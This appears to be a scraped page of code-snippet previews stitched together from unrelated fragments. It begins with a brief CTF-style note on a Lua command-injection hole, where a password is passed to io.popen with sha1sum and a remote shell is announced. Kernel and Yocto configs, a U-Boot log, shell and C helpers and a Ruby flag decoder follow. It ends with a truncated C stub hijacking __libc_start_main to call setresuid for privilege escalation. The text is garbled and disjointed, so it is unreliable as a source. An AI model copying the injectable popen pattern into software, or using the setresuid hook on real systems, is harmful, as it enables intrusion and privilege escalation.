This excercise is pretty easy. The password hash is calculated by passing a user controlled string to sha1sum
prog = io.popen("echo "..password.." | sha1sum", "r")
So let's inject some remote shell spawning code.
# | |
# Automatically generated file; DO NOT EDIT. | |
# Linux/arm 3.10.61 Kernel Configuration | |
# | |
CONFIG_ARM=y | |
CONFIG_SYS_SUPPORTS_APM_EMULATION=y | |
CONFIG_HAVE_PROC_CPU=y | |
CONFIG_STACKTRACE_SUPPORT=y | |
CONFIG_LOCKDEP_SUPPORT=y | |
CONFIG_TRACE_IRQFLAGS_SUPPORT=y |
BUFFALO U-BOOT Ver 1.00 | |
AP93 (ar7240) U-boot | |
sri | |
===================================================================================================================================== | |
TAP CALC (read_cnt=512) | |
----+-------------------------------------------------------------------------------------------------------------------------------- | |
TAP | 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 | |
----+-------------------------------------------------------------------------------------------------------------------------------- | |
FAIL| 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 512 512 512 512 512 512 512 512 512 512 512 512 512 512 512 |
MACHINE ??= 'udooqdl' | |
DISTRO ?= 'poky' | |
PACKAGE_CLASSES ?= "package_ipk" | |
EXTRA_IMAGE_FEATURES = "debug-tweaks" | |
DISTRO_FEATURES_remove = "x11 wayland" | |
USER_CLASSES ?= "buildstats image-mklibs" | |
PATCHRESOLVE = "noop" | |
BB_DISKMON_DIRS = "\ | |
STOPTASKS,${TMPDIR},1G,100K \ | |
STOPTASKS,${DL_DIR},1G,100K \ |
LCONF_VERSION = "6" | |
BBPATH = "${TOPDIR}" | |
BSPDIR := "${@os.path.abspath(os.path.dirname(d.getVar('FILE', True)) + '/../..')}" | |
BBFILES ?= "" | |
BBLAYERS = " \ | |
${BSPDIR}/sources/poky/meta \ | |
${BSPDIR}/sources/poky/meta-yocto \ | |
\ |
#!/bin/bash | |
if ! mount|grep -sq '/sys/kernel/debug'; then | |
mount -t debugfs none /sys/kernel/debug | |
fi | |
saved_path=$PWD | |
printf "%-24s %-24s %8s %6s %6s %9s\n" "clock" "parent" "flags" "en_cnt" "pre_cnt" "rate" |
/* | |
* Copyright (C) 2016 Love Park Robotics, LLC | |
* | |
* Licensed under the Apache License, Version 2.0 (the "License"); | |
* you may not use this file except in compliance with the License. | |
* You may obtain a copy of the License at | |
* | |
* http://www.apache.org/licenses/LICENSE-2.0 | |
* | |
* Unless required by applicable law or agreed to in writing, software |
#include <stdlib.h> | |
#include <unistd.h> | |
#include <string.h> | |
#include <sys/types.h> | |
#include <fcntl.h> | |
#include <stdio.h> | |
#include <sys/mman.h> | |
/* | |
* Return a random, non predictable file, and return the file descriptor for it. |
#!/usr/bin/env ruby | |
res = "857:g67?5ABBo:BtDA?tIvLDKL{MQPSRQWW." | |
dum = 0 | |
res.each_char do |x| | |
print (x.ord() -dum).chr | |
dum +=1 | |
end |
#include <linux/unistd.h>
void __cxa_finalize (void *d) {
return;
}
int __libc_start_main(int (*main) (int, char **, char **), int argc, char *argv, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void *stack_end) {
setresuid(geteuid(),geteuid(),geteuid());